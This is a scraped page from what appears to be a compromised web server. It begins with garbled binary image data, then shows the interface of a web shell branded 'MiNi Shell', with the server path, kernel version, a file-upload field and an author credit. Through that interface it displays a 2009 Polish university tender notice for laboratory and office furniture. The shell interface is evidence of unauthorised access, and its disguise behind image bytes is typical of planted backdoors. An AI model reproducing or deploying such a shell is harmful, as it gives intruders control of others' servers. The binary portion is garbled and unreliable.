JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/184611-N-2009.html

<p class="kh_header"><b>Katowice: Dostawa wraz z montażem mebli laboratoryjnych i biurowych  Śląskiego Uniwersytetu Medycznego w Katowicach.</b><br>
<b>Numer ogłoszenia: 184611 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Śląski Uniwersytet Medyczny w Katowicach , ul. Poniatowskiego 15, 40-055 Katowice, woj. śląskie, tel. 032 2083547, faks 032 2083568.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sum.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem mebli laboratoryjnych i biurowych  Śląskiego Uniwersytetu Medycznego w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa  mebli laboratoryjnych i biurowych . Zamawiający przedmiot zamówienia podzielił na V Pakietów:
Pakiet Nr I     -  Meble laboratoryjne;
Pakiet Nr II    -  Krzesła i taborety laboratoryjne;  
Pakiet Nr III   -  Stoły i szafy biurowe;
Pakiet nr IV   -  Szafy metalowe
Pakiet  nr V    - Regały archiwalne  ;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7, 39.11.20.00-0, 39.13.21.00-7, 39.13.00.00-2, 39.18.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
- posiadają uprawnienia do określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają   niezbędną  wiedzę   i   doświadczenie, oraz  dysponują   potencjałem  technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
- technicznego i osób zdolnych do wykonania zamówienia ;
- znajdują  się  w sytuacji  ekonomicznej i  finansowej  zapewniającej  wykonanie  zamówienia;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na  podstawie art. 24 ustawy Prawo zamówień publicznych;
a  w  szczególności:
- zrealizowali w okresie ostatnich  trzech lat, a jeżeli okres  prowadzenia  działalności jest  krótszy w tym okresie  przynajmniej trzy dostawy  tożsame 
z  przedmiotem  zamówienia;
- posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności ;
Sposób dokonania oceny spełnienia warunków udziału w postępowaniu: 
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów  na  zasadzie  spełnia / nie spełnia.
Ocena spełniania warunków wymaganych od Wykonawców prowadzona będzie na podstawie analizy dokumentów i oświadczeń załączonych do oferty Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2.1 Dla  potwierdzenia, że Wykonawca posiada uprawnienia   do   wykonywania    określonej działalności lub  czynności   oraz   nie    podlega   wykluczeniu    na    podstawie   art. 24   ustawy   Prawo   zamówień   publicznych  
-niżej wymienione dokumenty należy  dołączyć w  formie  oryginału  lub  kserokopii  potwierdzonej  za zgodność z  oryginałem  przez  Wykonawcę :   
a) aktualny odpis z właściwego  rejestru  albo  aktualne zaświadczenie o wpisie do  ewidencji  działalności  gospodarczej, jeżeli   odrębne   przepisy   wymagają   wpisu   do  rejestru   lub  zgłoszenia  do  ewidencji   działalności   gospodarczej- wystawionego nie wcześniej  niż  6 miesięcy  przed upływem  terminu składania ofert;
b) aktualne   zaświadczenie   właściwego    naczelnika    urzędu    skarbowego    oraz    właściwego    Oddziału   Zakładu Ubezpieczeń   Społecznych  lub   kasy   Rolniczego  Ubezpieczenia  Społecznego   potwierdzających  odpowiednio, że Wykonawca nie zalega  z opłaceniem podatków, opłat oraz  składek  na  ubezpieczenie  zdrowotne lub społeczne lub zaświadczeń, że uzyskał  przewidziane  prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości  wykonania  decyzji   właściwego  organu- wystawionego  nie  wcześniej  niż  3  miesiące przed upływem składania ofert; 
c) upoważnienie (w oryginale lub kopii  potwierdzonej notarialnie)do podpisywania  oferty, o ile nie wynika  ono  z  innych  dokumentów  załączonych  przez  Wykonawcę. 
2.2 W celu potwierdzenia opisanego przez zamawiającego  warunku  znajdowania   się przez Wykonawcę  w sytuacji   ekonomicznej   i    finansowej   zapewniającej    wykonanie  zamówienia, Zamawiający żąda:  
a) polisy,  a  w  przypadku  jej   braku   innego   dokumentu    potwierdzającego,  że  Wykonawca   jest  ubezpieczony  od odpowiedzialności  cywilnej w  zakresie   prowadzonej  działalności
2.3.W celu potwierdzenia niezbędnej  wiedzy i  doświadczenia  oraz  dysponowania potencjałem technicznym i osobami zdolnymi  do  wykonywania  zamówienia Zamawiający żąda:
a)  Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych dostaw  w okresie trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - 
w tym okresie przynajmniej 3 dostawy odpowiadające swoim  rodzajem 
i wartością dostawą  stanowiącym przedmiot za zmówienia  z  podaniem  ich  wartości,   przedmiotu, dat   wykonania  i  odbiorców  oraz  załączenia dokumentów
potwierdzających, że dostawy te zostały wykonane należycie;
2.3.W  celu  potwierdzenia, że oferowane dostawy odpowiadają  wymaganiom  określonym przez Zamawiającego,Wykonawca  zobowiązany  jest  dostarczyć:
 a/ katalogi,  zdjęcia,  foldery   zawierające   opis    parametrów   technicznych    przedmiotu  zamówienia;
 b/ wzorniki  kolorów;
c/deklarację  zgodności z normą: PN-EN 14056:2003-meble laboratoryjne, PN-EN 13150:2004 - stoły robocze dla laboratoriów, PN-EN 14073-2- szafy  biurowe,
2.4.  W  przypadku  powierzenia części  zamówienia  podwykonawcy   Wykonawca   zobowiązany  jest  dołączyć wykaz podwykonawców z  podaniem   nazwy  podwykonawców oraz  zakresu  podzlecanych  dostaw. 
2.5 Kwestię składania   dokumentów  przez   Wykonawców  mających   siedzibę  lub   miejsce   zamieszkania   poza terytorium  Rzeczypospolitej Polskiej,  reguluje  §2  Rozporządzenia  Prezesa Rady Ministrów  z  dnia  19 maja 2006r.  w  sprawie  rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy oraz form 
w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sum.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych,  Śląskiego Uniwersytetu Medycznego w Katowicach, ul. Poniatowskiego 15,  pokój 411, piętro IV..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 10:00, miejsce: Śląski Uniwersytet Medyczny w Katowicach, 40-055 Katowice,ul.Poniatowskiego15
- Kancelaria Główna pokój nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wraz z montażem mebli laboratoryjnych i biurowych dla jednostek organizacyjnych SUM 
w Katowicach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mebli laboratoryjnych  dla jednostek organizacyjnych Śląskiego Uniwersytetu Medycznego  w Katowicach.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7, 39.18.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa wraz z montażem mebli laboratoryjnych i biurowych dla jednostek organizacyjnych SUM w Katowicach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa krzeseł i taboretów laboratoryjnych dla jednostek organizacyjnych Śląskiego Uniwersytetu Medycznego  w Katowicach.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa wraz z montażem mebli laboratoryjnych i biurowych dla jednostek organizacyjnych SUM w Katowicach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa stołów i szaf dla jednostek organizacyjnych Śląskiego Uniwersytetu Medycznego  w Katowicach.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa wraz z montażem mebli  laboratoryjnych i biurowych  SUM w Katowicach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa szaf  metalowych dla jednostek organizacyjnych  Śląskiego  Uniwersytetu Medycznego w Katowicach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa wraz z montażem mebli. laboratoryjnych i biurowych  dla jednostek organizacyjnych  SUM w Katowicach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa  regałów archiwalnych dla jednostek organizacyjnych  Śląskiego Uniwersytetu Medycznego  w Katowicach.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com